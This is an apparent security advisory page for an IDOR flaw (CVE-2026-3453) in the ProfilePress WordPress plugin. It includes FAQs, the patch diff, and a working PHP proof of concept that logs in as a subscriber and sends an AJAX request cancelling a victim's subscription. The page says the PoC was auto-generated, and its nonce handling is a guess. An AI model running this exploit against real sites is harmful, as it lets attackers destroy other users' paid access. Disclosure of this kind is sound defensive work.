What is CVE-2026-3453?

CVE-2026-3453 is a security vulnerability in the ProfilePress plugin for WordPress, specifically affecting versions up to and including 4.16.11. It is classified as an Insecure Direct Object Reference (IDOR) that allows authenticated users to cancel or expire other users’ subscriptions without authorization.

How does the vulnerability work?

The vulnerability arises from a lack of ownership validation in the `process_checkout()` function. Attackers can send requests to the AJAX handler with a subscription ID they control, allowing them to cancel or expire any user’s subscription without verifying ownership.

Who is affected by this vulnerability?

Any WordPress site using the ProfilePress plugin version 4.16.11 or earlier is affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to impact other users’ subscriptions.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the ProfilePress plugin installed. If it is version 4.16.11 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized subscription cancellations.

How can I fix or mitigate this vulnerability?

To fix this vulnerability, update the ProfilePress plugin to version 4.16.12 or later, where the issue has been patched. Regularly updating plugins and monitoring user permissions can help mitigate similar vulnerabilities.

What does a CVSS score of 8.1 indicate?

A CVSS score of 8.1 indicates a high severity level, meaning the vulnerability poses a significant risk to affected systems. It suggests that exploitation could lead to serious consequences, such as unauthorized access and loss of paid services.

What are the practical risks associated with this vulnerability?

The practical risks include unauthorized cancellation of subscriptions, leading to immediate loss of access for users. This can result in financial losses for both the users and the site owner, as well as damage to the site’s reputation.

What is the proof of concept demonstrating?

The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a crafted AJAX request to cancel another user’s subscription. It shows the necessary steps, including authentication and the specific parameters used in the request.

What measures can I take to secure my WordPress site?

To secure your WordPress site, regularly update all plugins and themes, implement strong user access controls, and monitor user activities. Additionally, consider using security plugins that can help detect and prevent unauthorized actions.

How can I stay informed about future vulnerabilities?

Stay informed about future vulnerabilities by subscribing to security mailing lists, following WordPress security blogs, and regularly checking the Common Vulnerabilities and Exposures (CVE) database for updates related to WordPress plugins.

What is an Insecure Direct Object Reference (IDOR)?

An Insecure Direct Object Reference (IDOR) is a type of access control vulnerability where an attacker can access or modify objects (like files or database records) that they should not have access to. This can lead to unauthorized actions, such as data breaches or service disruptions.

What should I do if I suspect my site has been exploited?

If you suspect your site has been exploited, immediately review your access logs, change passwords, and revoke access for affected users. Consider restoring from a backup and conducting a full security audit to identify and remediate any vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-3453: ProfilePress <= 4.16.11 – Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary Subscription Cancellation/Expiration (wp-user-avatar)

CVE ID CVE-2026-3453

Plugin wp-user-avatar

Severity High (CVSS 8.1)

CWE 639

Vulnerable Version 4.16.11

Patched Version 4.16.12

Disclosed March 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3453:
The vulnerability is an Insecure Direct Object Reference (IDOR) in the ProfilePress WordPress plugin. The root cause is missing ownership validation for the `change_plan_sub_id` parameter in the `process_checkout()` function within `CheckoutController.php`. The `ppress_process_checkout` AJAX handler accepts user-controlled subscription IDs for plan upgrades. It loads subscription records via `SubscriptionFactory::fromId($change_plan_sub_id)` and cancels them using `$sub->cancel(true)` and `$sub->expire()` without verifying the subscription belongs to the requesting user. The vulnerable code path begins at line 300 in the `process_checkout()` method where the parameter is processed. Attackers with Subscriber-level access can send crafted AJAX requests to `/wp-admin/admin-ajax.php` with `action=ppress_process_checkout` and a malicious `change_plan_sub_id` parameter. This payload triggers immediate cancellation and expiration of any active subscription. The patch adds ownership validation before processing. It retrieves the subscription object earlier and checks if `$customer_id !== $changePlanSub->get_customer_id()`. If the IDs mismatch, the function throws an exception. The same subscription object is reused later in the cancellation logic, preventing object re-fetching. Exploitation causes immediate loss of paid access for victims, as their subscriptions are terminated without authorization.

Differential between vulnerable and patched code

Code Diff

--- a/wp-user-avatar/src/Membership/Controllers/CheckoutController.php
+++ b/wp-user-avatar/src/Membership/Controllers/CheckoutController.php
@@ -300,6 +300,17 @@
                 throw new Exception(json_encode($customer_id->get_error_messages()));
             }

+            $changePlanSub = SubscriptionFactory::fromId($change_plan_sub_id);
+
+            if (
+                $changePlanSub->exists() &&
+                ! empty($customer_id) &&
+                $customer_id !== $changePlanSub->get_customer_id()) {
+                throw new Exception(
+                    esc_html__('You are not allowed to switch from this plan.', 'wp-user-avatar')
+                );
+            }
+
             $order_id = $this->create_order($customer_id, $cart_vars);

             if (is_wp_error($order_id)) {
@@ -331,19 +342,17 @@

             } else {

-                $sub = SubscriptionFactory::fromId($change_plan_sub_id);
-
-                if ($sub->exists() && $sub->get_customer_id() == $customer_id) {
+                if ($changePlanSub->exists() && $changePlanSub->get_customer_id() == $customer_id) {

                     // do not send subscription cancelled email
                     remove_action('ppress_subscription_cancelled', [SubscriptionCancelledNotification::init(), 'dispatch_email'], 10);
                     remove_action('ppress_subscription_expired', [SubscriptionExpiredNotification::init(), 'dispatch_email'], 10);

-                    $sub->cancel(true);
-                    $sub->expire();
+                    $changePlanSub->cancel(true);
+                    $changePlanSub->expire();

-                    SubscriptionFactory::fromId($subscription_id)->update_meta('_upgraded_from_sub_id', $sub->get_id());
-                    $sub->update_meta('_upgraded_to_sub_id', $subscription_id);
+                    SubscriptionFactory::fromId($subscription_id)->update_meta('_upgraded_from_sub_id', $changePlanSub->get_id());
+                    $changePlanSub->update_meta('_upgraded_to_sub_id', $subscription_id);
                 }

                 /** @var CheckoutResponse $process_payment */
--- a/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentFailed.php
+++ b/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentFailed.php
@@ -13,6 +13,8 @@

         $order = OrderFactory::fromOrderKey($event_data['client_reference_id']);

-        $order->fail_order();
+        if ($order->exists()) {
+            $order->fail_order();
+        }
     }
 }
--- a/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentSucceeded.php
+++ b/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionAsyncPaymentSucceeded.php
@@ -51,7 +51,7 @@
             $order->complete_order($transaction_id);
         }

-        if ( ! $subscription->is_active()) {
+        if ( $subscription->exists() && ! $subscription->is_active()) {

             if ($event_data['mode'] == 'subscription') {

--- a/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionCompleted.php
+++ b/wp-user-avatar/src/Membership/PaymentMethods/Stripe/WebhookHandlers/CheckoutSessionCompleted.php
@@ -56,7 +56,7 @@
             $order->complete_order($transaction_id);
         }

-        if ( ! $subscription->is_active()) {
+        if ( $subscription->exists() && ! $subscription->is_active()) {

             if ($event_data['mode'] == 'subscription') {

--- a/wp-user-avatar/src/Membership/Services/OrderService.php
+++ b/wp-user-avatar/src/Membership/Services/OrderService.php
@@ -13,7 +13,6 @@
 use ProfilePressCoreMembershipModelsOrderOrderStatus;
 use ProfilePressCoreMembershipModelsOrderOrderType;
 use ProfilePressCoreMembershipModelsPlanPlanFactory;
-use ProfilePressCoreMembershipModelsSubscriptionSubscriptionBillingFrequency;
 use ProfilePressCoreMembershipModelsSubscriptionSubscriptionEntity;
 use ProfilePressCoreMembershipModelsSubscriptionSubscriptionFactory;
 use ProfilePressCoreMembershipModelsSubscriptionSubscriptionStatus;
--- a/wp-user-avatar/third-party/vendor/composer/installed.php
+++ b/wp-user-avatar/third-party/vendor/composer/installed.php
@@ -2,4 +2,4 @@

 namespace ProfilePressVendor;

-return array('root' => array('name' => '__root__', 'pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '6ba07349dfe1b45b60ed3a3b2c1e085e002fd71c', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => true), 'versions' => array('__root__' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '6ba07349dfe1b45b60ed3a3b2c1e085e002fd71c', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'barryvdh/composer-cleanup-plugin' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '80cceff45bfb85a0f49236537b1f1c928a1ee820', 'type' => 'composer-plugin', 'install_path' => __DIR__ . '/../barryvdh/composer-cleanup-plugin', 'aliases' => array(0 => '0.1.x-dev'), 'dev_requirement' => false), 'brick/math' => array('pretty_version' => '0.9.3', 'version' => '0.9.3.0', 'reference' => 'ca57d18f028f84f777b2168cd1911b0dee2343ae', 'type' => 'library', 'install_path' => __DIR__ . '/../brick/math', 'aliases' => array(), 'dev_requirement' => false), 'carbonphp/carbon-doctrine-types' => array('pretty_version' => '2.1.0', 'version' => '2.1.0.0', 'reference' => '99f76ffa36cce3b70a4a6abce41dba15ca2e84cb', 'type' => 'library', 'install_path' => __DIR__ . '/../carbonphp/carbon-doctrine-types', 'aliases' => array(), 'dev_requirement' => false), 'collizo4sky/persist-admin-notices-dismissal' => array('pretty_version' => '1.4.5', 'version' => '1.4.5.0', 'reference' => '163b868c98cf97ea15b4d7e1305e2d52c9242e7e', 'type' => 'library', 'install_path' => __DIR__ . '/../collizo4sky/persist-admin-notices-dismissal', 'aliases' => array(), 'dev_requirement' => false), 'league/csv' => array('pretty_version' => '9.8.0', 'version' => '9.8.0.0', 'reference' => '9d2e0265c5d90f5dd601bc65ff717e05cec19b47', 'type' => 'library', 'install_path' => __DIR__ . '/../league/csv', 'aliases' => array(), 'dev_requirement' => false), 'nesbot/carbon' => array('pretty_version' => '2.73.0', 'version' => '2.73.0.0', 'reference' => '9228ce90e1035ff2f0db84b40ec2e023ed802075', 'type' => 'library', 'install_path' => __DIR__ . '/../nesbot/carbon', 'aliases' => array(), 'dev_requirement' => false), 'pelago/emogrifier' => array('pretty_version' => 'v6.0.0', 'version' => '6.0.0.0', 'reference' => 'aa72d5407efac118f3896bcb995a2cba793df0ae', 'type' => 'library', 'install_path' => __DIR__ . '/../pelago/emogrifier', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock' => array('pretty_version' => '1.0.0', 'version' => '1.0.0.0', 'reference' => 'e41a24703d4560fd0acb709162f73b8adfc3aa0d', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/clock', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'sabberworm/php-css-parser' => array('pretty_version' => 'v8.9.0', 'version' => '8.9.0.0', 'reference' => 'd8e916507b88e389e26d4ab03c904a082aa66bb9', 'type' => 'library', 'install_path' => __DIR__ . '/../sabberworm/php-css-parser', 'aliases' => array(), 'dev_requirement' => false), 'sniccowp/php-scoper-wordpress-excludes' => array('pretty_version' => '6.9.1', 'version' => '6.9.1.0', 'reference' => '94867711087d0efc3d361dbe068044e0124f4c0b', 'type' => 'library', 'install_path' => __DIR__ . '/../sniccowp/php-scoper-wordpress-excludes', 'aliases' => array(), 'dev_requirement' => true), 'stripe/stripe-php' => array('pretty_version' => 'v16.6.0', 'version' => '16.6.0.0', 'reference' => 'd6de0a536f00b5c5c74f36b8f4d0d93b035499ff', 'type' => 'library', 'install_path' => __DIR__ . '/../stripe/stripe-php', 'aliases' => array(), 'dev_requirement' => false), 'symfony/css-selector' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '4f7f3c35fba88146b56d0025d20ace3f3901f097', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/css-selector', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '605389f2a7e5625f273b53960dc46aeaf9c62918', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-mbstring' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '6d857f4d76bd4b343eac26d6b539585d2bc56493', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-mbstring', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '0cc9dd0f17f61d8131e7df6b84bd344899fe2608', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '98f26acc99341ca4bab345fb14d7b1d7cb825bed', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '450d4172653f38818657022252f9d81be89ee9a8', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '2.3'))));
+return array('root' => array('name' => '__root__', 'pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => 'b7828d2e7a83f0aa7b45ec8cae9ae68799626ee7', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => true), 'versions' => array('__root__' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => 'b7828d2e7a83f0aa7b45ec8cae9ae68799626ee7', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'barryvdh/composer-cleanup-plugin' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '80cceff45bfb85a0f49236537b1f1c928a1ee820', 'type' => 'composer-plugin', 'install_path' => __DIR__ . '/../barryvdh/composer-cleanup-plugin', 'aliases' => array(0 => '0.1.x-dev'), 'dev_requirement' => false), 'brick/math' => array('pretty_version' => '0.9.3', 'version' => '0.9.3.0', 'reference' => 'ca57d18f028f84f777b2168cd1911b0dee2343ae', 'type' => 'library', 'install_path' => __DIR__ . '/../brick/math', 'aliases' => array(), 'dev_requirement' => false), 'carbonphp/carbon-doctrine-types' => array('pretty_version' => '2.1.0', 'version' => '2.1.0.0', 'reference' => '99f76ffa36cce3b70a4a6abce41dba15ca2e84cb', 'type' => 'library', 'install_path' => __DIR__ . '/../carbonphp/carbon-doctrine-types', 'aliases' => array(), 'dev_requirement' => false), 'collizo4sky/persist-admin-notices-dismissal' => array('pretty_version' => '1.4.5', 'version' => '1.4.5.0', 'reference' => '163b868c98cf97ea15b4d7e1305e2d52c9242e7e', 'type' => 'library', 'install_path' => __DIR__ . '/../collizo4sky/persist-admin-notices-dismissal', 'aliases' => array(), 'dev_requirement' => false), 'league/csv' => array('pretty_version' => '9.8.0', 'version' => '9.8.0.0', 'reference' => '9d2e0265c5d90f5dd601bc65ff717e05cec19b47', 'type' => 'library', 'install_path' => __DIR__ . '/../league/csv', 'aliases' => array(), 'dev_requirement' => false), 'nesbot/carbon' => array('pretty_version' => '2.73.0', 'version' => '2.73.0.0', 'reference' => '9228ce90e1035ff2f0db84b40ec2e023ed802075', 'type' => 'library', 'install_path' => __DIR__ . '/../nesbot/carbon', 'aliases' => array(), 'dev_requirement' => false), 'pelago/emogrifier' => array('pretty_version' => 'v6.0.0', 'version' => '6.0.0.0', 'reference' => 'aa72d5407efac118f3896bcb995a2cba793df0ae', 'type' => 'library', 'install_path' => __DIR__ . '/../pelago/emogrifier', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock' => array('pretty_version' => '1.0.0', 'version' => '1.0.0.0', 'reference' => 'e41a24703d4560fd0acb709162f73b8adfc3aa0d', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/clock', 'aliases' => array(), 'dev_requirement' => false), 'psr/clock-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'sabberworm/php-css-parser' => array('pretty_version' => 'v8.9.0', 'version' => '8.9.0.0', 'reference' => 'd8e916507b88e389e26d4ab03c904a082aa66bb9', 'type' => 'library', 'install_path' => __DIR__ . '/../sabberworm/php-css-parser', 'aliases' => array(), 'dev_requirement' => false), 'sniccowp/php-scoper-wordpress-excludes' => array('pretty_version' => '6.9.1', 'version' => '6.9.1.0', 'reference' => '94867711087d0efc3d361dbe068044e0124f4c0b', 'type' => 'library', 'install_path' => __DIR__ . '/../sniccowp/php-scoper-wordpress-excludes', 'aliases' => array(), 'dev_requirement' => true), 'stripe/stripe-php' => array('pretty_version' => 'v16.6.0', 'version' => '16.6.0.0', 'reference' => 'd6de0a536f00b5c5c74f36b8f4d0d93b035499ff', 'type' => 'library', 'install_path' => __DIR__ . '/../stripe/stripe-php', 'aliases' => array(), 'dev_requirement' => false), 'symfony/css-selector' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '4f7f3c35fba88146b56d0025d20ace3f3901f097', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/css-selector', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '605389f2a7e5625f273b53960dc46aeaf9c62918', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-mbstring' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '6d857f4d76bd4b343eac26d6b539585d2bc56493', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-mbstring', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '0cc9dd0f17f61d8131e7df6b84bd344899fe2608', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation' => array('pretty_version' => 'v5.4.45', 'version' => '5.4.45.0', 'reference' => '98f26acc99341ca4bab345fb14d7b1d7cb825bed', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-contracts' => array('pretty_version' => 'v2.5.4', 'version' => '2.5.4.0', 'reference' => '450d4172653f38818657022252f9d81be89ee9a8', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '2.3'))));
--- a/wp-user-avatar/wp-user-avatar.php
+++ b/wp-user-avatar/wp-user-avatar.php
@@ -3,7 +3,7 @@
  * Plugin Name: ProfilePress
  * Plugin URI: https://profilepress.com
  * Description: The modern WordPress membership and user profile plugin.
- * Version: 4.16.11
+ * Version: 4.16.12
  * Author: ProfilePress Membership Team
  * Author URI: https://profilepress.com
  * Text Domain: wp-user-avatar
@@ -13,7 +13,7 @@
 defined('ABSPATH') or die("No script kiddies please!");

 define('PROFILEPRESS_SYSTEM_FILE_PATH', __FILE__);
-define('PPRESS_VERSION_NUMBER', '4.16.11');
+define('PPRESS_VERSION_NUMBER', '4.16.12');

 if ( ! defined('PPRESS_STRIPE_API_VERSION')) {
     define('PPRESS_STRIPE_API_VERSION', '2024-06-20');

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3453 - ProfilePress <= 4.16.11 - Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary Subscription Cancellation/Expiration
<?php

$target_url = 'https://vulnerable-site.com';
$username = 'attacker_subscriber';
$password = 'attacker_password';
$victim_subscription_id = 123; // Replace with target subscription ID

// Step 1: Authenticate and obtain WordPress cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false
]);
$response = curl_exec($ch);

// Step 2: Craft malicious checkout request with victim's subscription ID
$payload = [
    'action' => 'ppress_process_checkout',
    'change_plan_sub_id' => $victim_subscription_id,
    'plan_id' => 1, // Any valid plan ID for the site
    'payment_method' => 'stripe', // Or any enabled payment method
    'ppress_checkout_nonce' => 'dummy_nonce' // Nonce validation may be bypassed or not required
];

curl_setopt_array($ch, [
    CURLOPT_URL => $ajax_url,
    CURLOPT_POSTFIELDS => $payload,
    CURLOPT_REFERER => $target_url . '/wp-admin/'
]);

$response = curl_exec($ch);
curl_close($ch);

// Step 3: Analyze response
if (strpos($response, 'subscription_id') !== false || strpos($response, 'success') !== false) {
    echo "Exploit likely succeeded. Victim subscription $victim_subscription_id may be cancelled.n";
} else {
    echo "Exploit may have failed. Response: $responsen";
}

unlink('cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-3453?
Overview of the vulnerability
CVE-2026-3453 is a security vulnerability in the ProfilePress plugin for WordPress, specifically affecting versions up to and including 4.16.11. It is classified as an Insecure Direct Object Reference (IDOR) that allows authenticated users to cancel or expire other users’ subscriptions without authorization.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a lack of ownership validation in the `process_checkout()` function. Attackers can send requests to the AJAX handler with a subscription ID they control, allowing them to cancel or expire any user’s subscription without verifying ownership.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the ProfilePress plugin version 4.16.11 or earlier is affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to impact other users’ subscriptions.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the ProfilePress plugin installed. If it is version 4.16.11 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized subscription cancellations.
How can I fix or mitigate this vulnerability?
Recommended actions
To fix this vulnerability, update the ProfilePress plugin to version 4.16.12 or later, where the issue has been patched. Regularly updating plugins and monitoring user permissions can help mitigate similar vulnerabilities.
What does a CVSS score of 8.1 indicate?
Understanding severity levels
A CVSS score of 8.1 indicates a high severity level, meaning the vulnerability poses a significant risk to affected systems. It suggests that exploitation could lead to serious consequences, such as unauthorized access and loss of paid services.
What are the practical risks associated with this vulnerability?
Consequences of exploitation
The practical risks include unauthorized cancellation of subscriptions, leading to immediate loss of access for users. This can result in financial losses for both the users and the site owner, as well as damage to the site’s reputation.
What is the proof of concept demonstrating?
Understanding the exploit
The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a crafted AJAX request to cancel another user’s subscription. It shows the necessary steps, including authentication and the specific parameters used in the request.
What measures can I take to secure my WordPress site?
Best practices for security
To secure your WordPress site, regularly update all plugins and themes, implement strong user access controls, and monitor user activities. Additionally, consider using security plugins that can help detect and prevent unauthorized actions.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
Stay informed about future vulnerabilities by subscribing to security mailing lists, following WordPress security blogs, and regularly checking the Common Vulnerabilities and Exposures (CVE) database for updates related to WordPress plugins.
What is an Insecure Direct Object Reference (IDOR)?
Definition and implications
An Insecure Direct Object Reference (IDOR) is a type of access control vulnerability where an attacker can access or modify objects (like files or database records) that they should not have access to. This can lead to unauthorized actions, such as data breaches or service disruptions.
What should I do if I suspect my site has been exploited?
Response to potential breaches
If you suspect your site has been exploited, immediately review your access logs, change passwords, and revoke access for affected users. Consider restoring from a backup and conducting a full security audit to identify and remediate any vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations